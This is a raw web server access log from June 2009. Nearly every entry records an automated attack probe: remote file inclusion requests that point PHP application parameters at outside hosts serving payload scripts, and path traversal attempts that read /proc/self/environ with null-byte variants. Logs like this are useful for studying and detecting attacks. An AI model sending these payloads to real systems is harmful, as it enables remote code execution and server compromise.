218.249.36.194 - - [06/Jun/2009:06:17:51 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:17:51 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:17:51 -0400] "GET /logs/access_log.Q109050900%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.255.37.201 - - [06/Jun/2009:06:17:57 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://klean-tech.com.tw/upload/idv4.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
218.249.36.194 - - [06/Jun/2009:06:18:13 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:18:13 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
78.111.80.18 - - [06/Jun/2009:06:18:17 -0400] "GET //?_zb_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
78.111.80.18 - - [06/Jun/2009:06:18:17 -0400] "GET /logs/access_log.Q109051100%20%20//?_zb_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
78.111.80.18 - - [06/Jun/2009:06:18:17 -0400] "GET /logs//?_zb_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 4371 "-" "Mozilla/5.0"
222.255.37.201 - - [06/Jun/2009:06:18:26 -0400] "GET /logs/error_log.Q109053100/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://klean-tech.com.tw/upload/idv4.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
218.249.36.194 - - [06/Jun/2009:06:18:32 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
78.24.219.48 - - [06/Jun/2009:06:19:39 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
218.249.36.194 - - [06/Jun/2009:06:20:04 -0400] "GET /logs/access_log.Q109050900%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
202.29.32.146 - - [06/Jun/2009:06:20:08 -0400] "GET /logs/xGB.php?act=admin&do=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 210 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
202.29.32.146 - - [06/Jun/2009:06:20:08 -0400] "GET /xGB.php?act=admin&do=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 205 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
202.29.32.146 - - [06/Jun/2009:06:20:08 -0400] "GET /errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
202.29.32.146 - - [06/Jun/2009:06:20:08 -0400] "GET /logs/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
202.29.32.146 - - [06/Jun/2009:06:20:10 -0400] "GET /xGB.php?act=admin&do=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 205 "-" "XXXXXX"
202.29.32.146 - - [06/Jun/2009:06:20:10 -0400] "GET /logs/xGB.php?act=admin&do=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 210 "-" "XXXXXX"
202.29.32.146 - - [06/Jun/2009:06:20:11 -0400] "GET /xGB.php?act=admin&do=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 205 "-" "XXXXXX"
202.29.32.146 - - [06/Jun/2009:06:20:11 -0400] "GET /logs/xGB.php?act=admin&do=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 210 "-" "XXXXXX"
218.249.36.194 - - [06/Jun/2009:06:20:15 -0400] "GET /logs/access_log.Q109051000%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.234.21.178 - - [06/Jun/2009:06:20:58 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
218.234.21.178 - - [06/Jun/2009:06:20:58 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
218.234.21.178 - - [06/Jun/2009:06:20:58 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
218.234.21.178 - - [06/Jun/2009:06:20:58 -0400] "GET /logs/error_log.Q109011700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
218.234.21.178 - - [06/Jun/2009:06:20:58 -0400] "GET /logs/error_log.Q109011700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
218.234.21.178 - - [06/Jun/2009:06:20:58 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
78.111.80.18 - - [06/Jun/2009:06:22:15 -0400] "GET //codebb/lang_select?phpbb_root_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
78.111.80.18 - - [06/Jun/2009:06:22:15 -0400] "GET /logs//codebb/lang_select?phpbb_root_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
78.111.80.18 - - [06/Jun/2009:06:22:15 -0400] "GET /logs/error_log.Q109012600//codebb/lang_select?phpbb_root_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:06:22:18 -0400] "GET /logs/access_log.Q109051800//include/write.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
77.221.130.2 - - [06/Jun/2009:06:22:21 -0400] "GET /logs/access_log.Q109053100/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 276 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.221.130.2 - - [06/Jun/2009:06:22:21 -0400] "GET /logs/access_log.Q109053100/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
77.221.130.2 - - [06/Jun/2009:06:22:21 -0400] "GET /logs/access_log.Q109053100/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 276 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:22:21 -0400] "GET /logs/access_log.Q109053100/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 276 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:22:25 -0400] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.221.130.2 - - [06/Jun/2009:06:22:25 -0400] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.221.130.2 - - [06/Jun/2009:06:22:25 -0400] "GET /logs/error_log.Q109051400/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
209.59.12.99 - - [06/Jun/2009:06:22:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.2 - - [06/Jun/2009:06:22:25 -0400] "GET /logs/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
77.221.130.2 - - [06/Jun/2009:06:22:25 -0400] "GET /errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
77.221.130.2 - - [06/Jun/2009:06:22:25 -0400] "GET /logs/error_log.Q109051400/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
77.221.130.2 - - [06/Jun/2009:06:22:25 -0400] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 254 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:22:25 -0400] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 249 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:22:25 -0400] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 254 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:22:25 -0400] "GET /logs/error_log.Q109051400/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:22:26 -0400] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 249 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:22:26 -0400] "GET /logs/error_log.Q109051400/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX"
218.234.21.178 - - [06/Jun/2009:06:22:39 -0400] "GET /logs/error_log.Q108032100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
218.234.21.178 - - [06/Jun/2009:06:22:39 -0400] "GET /logs/error_log.Q108032100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
195.162.25.67 - - [06/Jun/2009:06:23:16 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://alinutz.do.am/v1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
195.162.25.67 - - [06/Jun/2009:06:23:16 -0400] "GET /logs/error_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://alinutz.do.am/v1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
195.162.25.67 - - [06/Jun/2009:06:23:16 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://alinutz.do.am/v1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:06:23:41 -0400] "GET /logs/access_log.Q109050900%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
64.182.124.1 - - [06/Jun/2009:06:23:58 -0400] "GET /logs/access_log.Q109051600//?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.0" 404 226 "-" "Mozilla/5.0"
74.6.8.112 - - [06/Jun/2009:06:24:02 -0400] "GET /logs/error_log.Q108051400 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
195.162.25.67 - - [06/Jun/2009:06:24:06 -0400] "GET /logs/error_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://alinutz.do.am/v1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
77.221.130.2 - - [06/Jun/2009:06:25:03 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?GLOBALS[mosConfig_absolute_path]=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 255 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
77.221.130.2 - - [06/Jun/2009:06:25:03 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?GLOBALS[mosConfig_absolute_path]=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 277 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
77.221.130.2 - - [06/Jun/2009:06:25:03 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?GLOBALS[mosConfig_absolute_path]=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
77.221.130.2 - - [06/Jun/2009:06:25:03 -0400] "GET /logs/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
77.221.130.2 - - [06/Jun/2009:06:25:03 -0400] "GET /errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
77.221.130.2 - - [06/Jun/2009:06:25:03 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
77.221.130.2 - - [06/Jun/2009:06:25:03 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 255 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:25:03 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 250 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:25:03 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 277 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:25:03 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 255 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:25:03 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 250 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:25:03 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 277 "-" "XXXXXX"
203.151.233.106 - - [06/Jun/2009:06:26:16 -0400] "GET /bbs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
203.151.233.106 - - [06/Jun/2009:06:26:16 -0400] "GET /logs/access_log.Q109052900/bbs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
203.151.233.106 - - [06/Jun/2009:06:26:16 -0400] "GET /logs/bbs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
77.221.130.2 - - [06/Jun/2009:06:26:17 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?GLOBALS[mosConfig_absolute_path]=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 277 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
77.221.130.2 - - [06/Jun/2009:06:26:17 -0400] "GET /logs/access_log.Q109053100/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
77.221.130.2 - - [06/Jun/2009:06:26:18 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 277 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:26:18 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 277 "-" "XXXXXX"
78.24.219.48 - - [06/Jun/2009:06:26:24 -0400] "GET /logs/access_log.Q109051600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 243 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:06:26:25 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 221 "-" "libwww-perl/5.826"
203.151.233.106 - - [06/Jun/2009:06:26:25 -0400] "GET /logs/bbs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
203.151.233.106 - - [06/Jun/2009:06:26:25 -0400] "GET /logs/access_log.Q109052900%20%20/bbs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
203.151.233.106 - - [06/Jun/2009:06:26:26 -0400] "GET /bbs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
77.221.130.2 - - [06/Jun/2009:06:26:26 -0400] "GET /logs/access_log.Q109053100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 267 "-" "Mozilla/3.0 (OS/2; U)"
77.221.130.2 - - [06/Jun/2009:06:26:26 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 240 "-" "Mozilla/3.0 (OS/2; U)"
77.221.130.2 - - [06/Jun/2009:06:26:26 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 245 "-" "Mozilla/3.0 (OS/2; U)"
77.221.130.2 - - [06/Jun/2009:06:26:27 -0400] "GET /logs/access_log.Q109053100/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
77.221.130.2 - - [06/Jun/2009:06:26:27 -0400] "GET /logs/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
77.221.130.2 - - [06/Jun/2009:06:26:27 -0400] "GET /errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
77.221.130.2 - - [06/Jun/2009:06:26:27 -0400] "GET /logs/access_log.Q109053100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 267 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:26:27 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 245 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:26:27 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 240 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:26:27 -0400] "GET /logs/access_log.Q109053100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 267 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:26:27 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 240 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:26:27 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 245 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:26:36 -0400] "GET /logs/error_log.Q109051400//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 266 "-" "Mozilla/3.0 (OS/2; U)"
77.221.130.2 - - [06/Jun/2009:06:26:36 -0400] "GET /logs/error_log.Q109051400/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
77.221.130.2 - - [06/Jun/2009:06:26:37 -0400] "GET /logs/error_log.Q109051400//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 266 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:26:37 -0400] "GET /logs/error_log.Q109051400//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 266 "-" "XXXXXX"
70.85.249.226 - - [06/Jun/2009:06:26:52 -0400] "GET /logs/access_log.Q109051100%20%20//?_zb_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
70.85.249.226 - - [06/Jun/2009:06:26:52 -0400] "GET //?_zb_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
70.85.249.226 - - [06/Jun/2009:06:26:52 -0400] "GET /logs//?_zb_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 200 4371 "-" "Mozilla/5.0"
78.24.219.48 - - [06/Jun/2009:06:27:01 -0400] "GET /logs/error_log.Q109051600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 242 "-" "libwww-perl/5.826"
211.49.99.7 - - [06/Jun/2009:06:27:18 -0400] "GET /logs/access_log.Q109052900/bbs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.49.99.7 - - [06/Jun/2009:06:27:18 -0400] "GET /bbs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.49.99.7 - - [06/Jun/2009:06:27:19 -0400] "GET /logs/bbs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
